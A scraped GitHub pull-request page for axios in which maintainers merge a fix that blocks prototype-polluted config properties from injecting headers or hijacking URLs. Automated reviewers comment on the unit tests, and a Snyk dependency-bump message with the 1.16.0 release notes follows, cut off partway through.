Skip to content

fix: more header pollutions#10779

Merged
jasonsaayman merged 5 commits into
v1.xfrom
fix/axi-226-pollution-in-http-adapter
Apr 20, 2026
Merged

fix: more header pollutions#10779
jasonsaayman merged 5 commits into
v1.xfrom
fix/axi-226-pollution-in-http-adapter

Conversation

@jasonsaayman
Copy link
Copy Markdown
Member

@jasonsaayman jasonsaayman commented Apr 20, 2026
edited by cubic-dev-ai Bot
Loading

Summary by cubic

Prevents prototype‑polluted configs from injecting headers or hijacking URLs by reading only own properties and using null‑prototype configs. Hardens the Node HTTP adapter so polluted auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser cannot influence requests. Addresses Linear AXI-226.

Description

  • Summary of changes
    • HTTP adapter: read own auth/beforeRedirect; set options.insecureHTTPParser = Boolean(own('insecureHTTPParser')); build options and beforeRedirects with null prototypes.
    • resolveConfig: read only own props and build URLs via buildFullPath(baseURL, url, allowAbsoluteUrls).
    • mergeConfig: return a null‑prototype object and restore hasOwnProperty as a non‑enumerable own slot.
    • Validator: use an own‑property check on the schema to avoid polluted validators.
  • Reasoning
    • Stops prototype pollution from setting Authorization, altering redirect behavior, enabling insecure parsing, or hijacking baseURL.
    • Null‑prototype configs ensure nothing inherited from Object.prototype is observed by runtime code or Node’s http.request.
  • Additional context
    • Extends AXI-226 hardening to more gadgets and aligns with GHSA‑q8qp‑cvcw‑x6jj.

Docs

Add a brief note in /docs/ (security) about stricter own‑property reads and null‑prototype configs. No API changes.

Testing

Added unit tests covering: ignored polluted auth, socketPath, beforeRedirect, insecureHTTPParser, and baseURL (including allowAbsoluteUrls: false); strict parser failures validated via HPE_* codes when pollution is blocked; null‑prototype structure and hasOwnProperty; and broader gadget coverage (adapter, agents, proxy, content/redirect limits, params/paramsSerializer, method, decompress, responseType, transforms). Updated tests to be parser‑version agnostic.

Semantic version impact

Patch: security hardening and bug fixes only; no breaking changes.

Written for commit 17c83a5. Summary will update on new commits.

@jasonsaayman jasonsaayman self-assigned this Apr 20, 2026
@jasonsaayman jasonsaayman added priority::medium A medium priority commit::fix The PR is related to a bugfix labels Apr 20, 2026
cubic-dev-ai[bot]
cubic-dev-ai Bot reviewed Apr 20, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@cubic-dev-ai cubic-dev-ai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

2 issues found across 3 files

Confidence score: 4/5

  • This PR appears safe to merge with minimal risk because the reported problems are test-design gaps in tests/unit/prototypePollution.test.js, not a confirmed runtime break in production code.
  • The most severe issue is that using an absolute URL bypasses polluted Object.prototype.baseURL, so the current test may not actually validate the prototype-inheritance path and could miss a regression.
  • A second issue is that the assertion uses a well-formed server response, which does not clearly separate secure vs. polluted parsing behavior; this weakens confidence that the gadget-blocking behavior is truly enforced.
  • Pay close attention to tests/unit/prototypePollution.test.js - security-focused assertions may be giving false confidence unless URL handling and malformed-header failure paths are exercised.
Prompt for AI agents (unresolved issues) 

Check if these issues are valid — if so, understand the root cause of each and fix them. If appropriate, use sub-agents to investigate and fix each issue separately.


<file name="tests/unit/prototypePollution.test.js">

<violation number="1" location="tests/unit/prototypePollution.test.js:435">
P2: This assertion never distinguishes secure vs. polluted parsing because the server response is well-formed. Use a malformed header response and assert the request still fails to actually verify the gadget is blocked.</violation>

<violation number="2" location="tests/unit/prototypePollution.test.js:505">
P2: This request uses an absolute URL, so the polluted `Object.prototype.baseURL` is ignored. Use `allowAbsoluteUrls: false` (or a relative URL) so the test actually exercises the inheritance path.</violation>
</file>

Reply with feedback, questions, or to request a fix. Tag @cubic-dev-ai to re-run a review.

Comment thread tests/unit/prototypePollution.test.js
Comment thread tests/unit/prototypePollution.test.js Outdated
cubic-dev-ai[bot]
cubic-dev-ai Bot reviewed Apr 20, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@cubic-dev-ai cubic-dev-ai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

1 issue found across 2 files (changes from recent commits).

Prompt for AI agents (unresolved issues) 

Check if these issues are valid — if so, understand the root cause of each and fix them. If appropriate, use sub-agents to investigate and fix each issue separately.


<file name="tests/unit/prototypePollution.test.js">

<violation number="1" location="tests/unit/prototypePollution.test.js:531">
P2: This test expects the wrong parser error code for LF-only responses. Strict llhttp parsing should report `HPE_LF_EXPECTED`, so matching `HPE_CR_EXPECTED` will make the test fail incorrectly.</violation>
</file>

Reply with feedback, questions, or to request a fix. Tag @cubic-dev-ai to re-run a review.

Comment thread tests/unit/prototypePollution.test.js Outdated
@jasonsaayman jasonsaayman merged commit 4791514 into v1.x Apr 20, 2026
32 of 33 checks passed
@jasonsaayman jasonsaayman deleted the fix/axi-226-pollution-in-http-adapter branch April 20, 2026 19:33
@github-actions github-actions Bot mentioned this pull request Apr 21, 2026
Open
Felk
Felk reviewed Apr 23, 2026
View reviewed changes
Comment thread lib/core/mergeConfig.js

// Use a null-prototype object so that downstream reads such as `config.auth`
// or `config.baseURL` cannot inherit polluted values from Object.prototype
// (see GHSA-q8qp-cvcw-x6jj). `hasOwnProperty` is restored as a non-enumerable
Copy link
Copy Markdown

@Felk Felk Apr 23, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this GHSA not public yet? I wanted to take a peek, but it 404s right now: GHSA-q8qp-cvcw-x6jj

Copy link
Copy Markdown
Member Author

@jasonsaayman jasonsaayman Apr 23, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes sorry should not have referenced this yet as I am trying to fix the CVEs and then do the release in a more rolled out manner. Please see the security docs. I will improve this process.

Copy link
Copy Markdown

@Felk Felk Apr 23, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Alright, thanks for the clarification!

This was referenced Apr 25, 2026
Closed
Closed
@coderabbitai coderabbitai Bot mentioned this pull request May 2, 2026
Draft
@rtibblesbot rtibblesbot mentioned this pull request May 8, 2026
Merged
@commercelayer-ci commercelayer-ci mentioned this pull request May 24, 2026
Closed
saikumarrs pushed a commit to rudderlabs/rudder-sdk-node that referenced this pull request May 24, 2026
@achettyiitr @snyk-bot
chore(deps): bump axios from 1.15.2 to 1.16.0 [Snyk] (#423)
8e7d703 
![snyk-top-banner](https://res.cloudinary.com/snyk/image/upload/r-d/scm-platform/snyk-pull-requests/pr-banner-default.svg)


<h3>Snyk has created this PR to upgrade axios from 1.15.2 to
1.16.0.</h3>

:information_source: Keep your dependencies up-to-date. This makes it
easier to fix existing vulnerabilities and to more quickly identify and
fix newly disclosed vulnerabilities when they affect your project.

<hr/>


- The recommended version is **1 version** ahead of your current
version.

- The recommended version was released **21 days ago**.


#### Breaking Change Risk

![Merge Risk:
Medium](https://img.shields.io/badge/Merge%20Risk%3A%20Medium-8B4513?style=for-the-badge)

> **Notice:** This assessment is enhanced by AI.


<details>
<summary><b>Release notes</b></summary>
<br/>
  <details>
    <summary>Package name: <b>axios</b></summary>
    <ul>
      <li>
<b>1.16.0</b> - <a
href="https://redirect.github.com/axios/axios/releases/tag/v1.16.0">2026-05-02</a></br><h2>v1.16.0
— May 2, 2026</h2>
<p>This release adds support for the QUERY HTTP method and a new
<code>ECONNREFUSED</code> error constant, lands a substantial wave of
HTTP, fetch, and XHR adapter bug fixes around redirects, aborts,
headers, and timeouts, and welcomes 23 new contributors.</p>
<h2><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Notable
Changes</h2>
<p>A handful of fixes in this release are either security-adjacent or
change observable behaviour. Please review before upgrading:</p>
<ul>
<li><strong>Fetch adapter now enforces <code>maxBodyLength</code> and
<code>maxContentLength</code>.</strong> These limits were silently
ignored on the fetch adapter prior to 1.16.0 — anyone relying on them as
a safety net (DoS protection, accidental large uploads) had no
protection. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4310518523"
data-permission-text="Title is private"
data-url="axios/axios#10795"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10795/hovercard"
href="https://redirect.github.com/axios/axios/pull/10795">#10795</a></strong>)</li>
<li><strong>Proxy requests now preserve user-supplied <code>Host</code>
headers.</strong> Previously, the proxy path could overwrite a custom
<code>Host</code>. Virtual-host-style routing through a proxy will now
behave correctly. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4347021851"
data-permission-text="Title is private"
data-url="axios/axios#10822"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10822/hovercard"
href="https://redirect.github.com/axios/axios/pull/10822">#10822</a></strong>)</li>
<li><strong>Basic auth credentials embedded in URLs are now
URL-decoded.</strong> If you have percent-encoded credentials in a URL
(e.g. <code>https://user:p%40ss@host</code>), the decoded value is what
now goes on the wire. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4351589744"
data-permission-text="Title is private"
data-url="axios/axios#10825"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10825/hovercard"
href="https://redirect.github.com/axios/axios/pull/10825">#10825</a></strong>)</li>
<li><strong><code>parseProtocol</code> now strictly requires a colon in
the protocol separator.</strong> Strings that loosely parsed as
protocols before may no longer match. (<strong><a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4271998290" data-permission-text="Title is private"
data-url="axios/axios#10729"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10729/hovercard"
href="https://redirect.github.com/axios/axios/pull/10729">#10729</a></strong>)</li>
<li><strong>Deprecated <code>unescape()</code> replaced with modern
UTF-8 encoding.</strong> Non-ASCII URL handling is now spec-correct;
consumers depending on legacy <code>unescape()</code> quirks may see
different output bytes. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="3912225221"
data-permission-text="Title is private"
data-url="axios/axios#7378"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7378/hovercard"
href="https://redirect.github.com/axios/axios/pull/7378">#7378</a></strong>)</li>
<li><strong><code>transformRequest</code> input typing change was
reverted.</strong> The typing change introduced in <a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4284929830" data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a> was
reverted in <a class="issue-link js-issue-link" data-error-text="Failed
to load title" data-id="4336537376" data-permission-text="Title is
private" data-url="axios/axios#10810"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10810/hovercard"
href="https://redirect.github.com/axios/axios/pull/10810">#10810</a>
after follow-up review — net behavior is unchanged from 1.15.2.
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4284929830" data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4336537376" data-permission-text="Title is private"
data-url="axios/axios#10810"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10810/hovercard"
href="https://redirect.github.com/axios/axios/pull/10810">#10810</a></strong>)</li>
</ul>
<h2>🚀 New Features</h2>
<ul>
<li><strong>QUERY HTTP Method:</strong> Added support for the QUERY HTTP
method across adapters and type definitions. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4323864507" data-permission-text="Title is private"
data-url="axios/axios#10802"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10802/hovercard"
href="https://redirect.github.com/axios/axios/pull/10802">#10802</a></strong>)</li>
<li><strong>ECONNREFUSED Error Constant:</strong> Exposed
<code>ECONNREFUSED</code> as a constant on <code>AxiosError</code> so
callers can match connection-refused failures without comparing string
literals (closes <a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="2398798239"
data-permission-text="Title is private"
data-url="axios/axios#6485"
data-hovercard-type="issue"
data-hovercard-url="/axios/axios/issues/6485/hovercard"
href="https://redirect.github.com/axios/axios/issues/6485">#6485</a>).
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4235938363" data-permission-text="Title is private"
data-url="axios/axios#10680"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10680/hovercard"
href="https://redirect.github.com/axios/axios/pull/10680">#10680</a></strong>)</li>
<li><strong>Encode Helper Export:</strong> Exported the internal
<code>encode</code> helper from <code>buildURL</code> so userland param
serializers can reuse the same encoding logic that axios uses
internally. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="3023608053"
data-permission-text="Title is private"
data-url="axios/axios#6897"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6897/hovercard"
href="https://redirect.github.com/axios/axios/pull/6897">#6897</a></strong>)</li>
</ul>
<h2>🐛 Bug Fixes</h2>
<ul>
<li><strong>HTTP Adapter — Redirects &amp; Headers:</strong> Cleared
stale headers when a redirect targets a no-proxy host, fixed the
redirect listener chain so listeners no longer stack across hops,
restored the missing <code>requestDetails</code> argument on
<code>beforeRedirect</code>, preserved user-supplied <code>Host</code>
headers when forwarding through a proxy, and properly URL-decoded basic
auth credentials. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4310371730"
data-permission-text="Title is private"
data-url="axios/axios#10794"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10794/hovercard"
href="https://redirect.github.com/axios/axios/pull/10794">#10794</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4323346513" data-permission-text="Title is private"
data-url="axios/axios#10800"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10800/hovercard"
href="https://redirect.github.com/axios/axios/pull/10800">#10800</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="2141603120" data-permission-text="Title is private"
data-url="axios/axios#6241"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6241/hovercard"
href="https://redirect.github.com/axios/axios/pull/6241">#6241</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4347021851" data-permission-text="Title is private"
data-url="axios/axios#10822"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10822/hovercard"
href="https://redirect.github.com/axios/axios/pull/10822">#10822</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4351589744" data-permission-text="Title is private"
data-url="axios/axios#10825"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10825/hovercard"
href="https://redirect.github.com/axios/axios/pull/10825">#10825</a></strong>)</li>
<li><strong>HTTP Adapter — Streams &amp; Timeouts:</strong> Preserved
the partial response object on <code>AxiosError</code> when a stream is
aborted after headers arrive, honoured the <code>timeout</code> option
during the connect phase when redirects are disabled, and resolved an
unsettled-promise hang when an aborted request was combined with
compression and <code>maxRedirects: 0</code>. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4260994859" data-permission-text="Title is private"
data-url="axios/axios#10708"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10708/hovercard"
href="https://redirect.github.com/axios/axios/pull/10708">#10708</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4344944445" data-permission-text="Title is private"
data-url="axios/axios#10819"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10819/hovercard"
href="https://redirect.github.com/axios/axios/pull/10819">#10819</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3509777101" data-permission-text="Title is private"
data-url="axios/axios#7149"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7149/hovercard"
href="https://redirect.github.com/axios/axios/pull/7149">#7149</a></strong>)</li>
<li><strong>Fetch Adapter:</strong> Enforced <code>maxBodyLength</code>
/ <code>maxContentLength</code> in the fetch adapter, set the
<code>User-Agent</code> header to match the HTTP adapter, preserved the
original abort reason instead of replacing it with a generic error, and
deferred global access so importing the module no longer throws a
<code>TypeError</code> in restricted environments. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4310518523" data-permission-text="Title is private"
data-url="axios/axios#10795"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10795/hovercard"
href="https://redirect.github.com/axios/axios/pull/10795">#10795</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4294198336" data-permission-text="Title is private"
data-url="axios/axios#10772"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10772/hovercard"
href="https://redirect.github.com/axios/axios/pull/10772">#10772</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4336242387" data-permission-text="Title is private"
data-url="axios/axios#10806"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10806/hovercard"
href="https://redirect.github.com/axios/axios/pull/10806">#10806</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3662226069" data-permission-text="Title is private"
data-url="axios/axios#7260"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7260/hovercard"
href="https://redirect.github.com/axios/axios/pull/7260">#7260</a></strong>)</li>
<li><strong>XHR Adapter:</strong> Unsubscribed the
<code>cancelToken</code> and <code>AbortSignal</code> listeners on the
error, timeout, and abort code paths to prevent leaked subscriptions.
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4303641135" data-permission-text="Title is private"
data-url="axios/axios#10787"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10787/hovercard"
href="https://redirect.github.com/axios/axios/pull/10787">#10787</a></strong>)</li>
<li><strong>Error Handling:</strong> Attached the parsed response to
<code>AxiosError</code> when <code>JSON.parse</code> fails inside
<code>dispatchRequest</code>, prevented <code>settle</code> from
emitting <code>undefined</code> error codes, and tightened the
<code>parseProtocol</code> regex to require a colon in the protocol
separator. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4270604544"
data-permission-text="Title is private"
data-url="axios/axios#10724"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10724/hovercard"
href="https://redirect.github.com/axios/axios/pull/10724">#10724</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3678162351" data-permission-text="Title is private"
data-url="axios/axios#7276"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7276/hovercard"
href="https://redirect.github.com/axios/axios/pull/7276">#7276</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4271998290" data-permission-text="Title is private"
data-url="axios/axios#10729"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10729/hovercard"
href="https://redirect.github.com/axios/axios/pull/10729">#10729</a></strong>)</li>
<li><strong>Types &amp; Exports:</strong> Aligned the CommonJS
<code>CancelToken</code> typings with the ESM build, fixed a compiler
error caused by <code>RawAxiosHeaders</code>, and re-exported
<code>create</code> from the package index. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="3959718695" data-permission-text="Title is private"
data-url="axios/axios#7414"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7414/hovercard"
href="https://redirect.github.com/axios/axios/pull/7414">#7414</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="2291674940" data-permission-text="Title is private"
data-url="axios/axios#6389"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6389/hovercard"
href="https://redirect.github.com/axios/axios/pull/6389">#6389</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="2365076865" data-permission-text="Title is private"
data-url="axios/axios#6460"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6460/hovercard"
href="https://redirect.github.com/axios/axios/pull/6460">#6460</a></strong>)</li>
<li><strong>UTF-8 Encoding:</strong> Replaced the deprecated
<code>unescape()</code> call with a modern UTF-8 encoding
implementation. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="3912225221"
data-permission-text="Title is private"
data-url="axios/axios#7378"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7378/hovercard"
href="https://redirect.github.com/axios/axios/pull/7378">#7378</a></strong>)</li>
<li><strong>Misc Cleanup:</strong> Resolved a batch of small
inconsistencies and gadget-level issues across the codebase. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4365717510" data-permission-text="Title is private"
data-url="axios/axios#10833"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10833/hovercard"
href="https://redirect.github.com/axios/axios/pull/10833">#10833</a></strong>)</li>
</ul>
<h2>🔧 Maintenance &amp; Chores</h2>
<ul>
<li><strong>Refactor — ES6 Modernisation:</strong> Modernised the
<code>utils</code> module and XHR adapter to use ES6 features, and
tidied the multipart boundary error message. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4173424907" data-permission-text="Title is private"
data-url="axios/axios#10588"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10588/hovercard"
href="https://redirect.github.com/axios/axios/pull/10588">#10588</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3967256044" data-permission-text="Title is private"
data-url="axios/axios#7419"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7419/hovercard"
href="https://redirect.github.com/axios/axios/pull/7419">#7419</a></strong>)</li>
<li><strong>Tests:</strong> Hardened the HTTP test server lifecycle to
fix flaky <code>FormData</code> EPIPE failures, fixed Win32 platform
support for the pipe tests, and corrected an incorrect test assumption.
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4345005129" data-permission-text="Title is private"
data-url="axios/axios#10820"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10820/hovercard"
href="https://redirect.github.com/axios/axios/pull/10820">#10820</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4305591702" data-permission-text="Title is private"
data-url="axios/axios#10791"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10791/hovercard"
href="https://redirect.github.com/axios/axios/pull/10791">#10791</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4310668356" data-permission-text="Title is private"
data-url="axios/axios#10796"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10796/hovercard"
href="https://redirect.github.com/axios/axios/pull/10796">#10796</a></strong>)</li>
<li><strong>Docs:</strong> Documented
<code>paramsSerializer.encode</code> for strict RFC 3986 query encoding,
updated the <code>parseReviver</code> TypeScript definitions and
configuration docs for ES2023, added timeout guidance to the README's
first async example, and expanded notes around the recent type changes.
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4346633084" data-permission-text="Title is private"
data-url="axios/axios#10821"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10821/hovercard"
href="https://redirect.github.com/axios/axios/pull/10821">#10821</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4298576114" data-permission-text="Title is private"
data-url="axios/axios#10782"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10782/hovercard"
href="https://redirect.github.com/axios/axios/pull/10782">#10782</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4290932663" data-permission-text="Title is private"
data-url="axios/axios#10759"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10759/hovercard"
href="https://redirect.github.com/axios/axios/pull/10759">#10759</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4335735712" data-permission-text="Title is private"
data-url="axios/axios#10804"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10804/hovercard"
href="https://redirect.github.com/axios/axios/pull/10804">#10804</a></strong>)</li>
<li><strong>Reverted:</strong> Reverted the
<code>transformRequest</code> input typing change from <a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4284929830" data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a>
after follow-up review. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4284929830"
data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4336537376" data-permission-text="Title is private"
data-url="axios/axios#10810"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10810/hovercard"
href="https://redirect.github.com/axios/axios/pull/10810">#10810</a></strong>)</li>
<li><strong>Dependencies:</strong> Bumped
<code>actions/setup-node</code>, the <code>github-actions</code> group,
and <code>postcss</code> (in <code>/docs</code>) to their latest
versions. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4301894928"
data-permission-text="Title is private"
data-url="axios/axios#10785"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10785/hovercard"
href="https://redirect.github.com/axios/axios/pull/10785">#10785</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4342327794" data-permission-text="Title is private"
data-url="axios/axios#10813"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10813/hovercard"
href="https://redirect.github.com/axios/axios/pull/10813">#10813</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4342985432" data-permission-text="Title is private"
data-url="axios/axios#10814"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10814/hovercard"
href="https://redirect.github.com/axios/axios/pull/10814">#10814</a></strong>)</li>
<li><strong>Release:</strong> Updated changelog and packages, and
prepared the 1.16.0 release. (<strong><a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4304455485" data-permission-text="Title is private"
data-url="axios/axios#10790"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10790/hovercard"
href="https://redirect.github.com/axios/axios/pull/10790">#10790</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4368693595" data-permission-text="Title is private"
data-url="axios/axios#10834"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10834/hovercard"
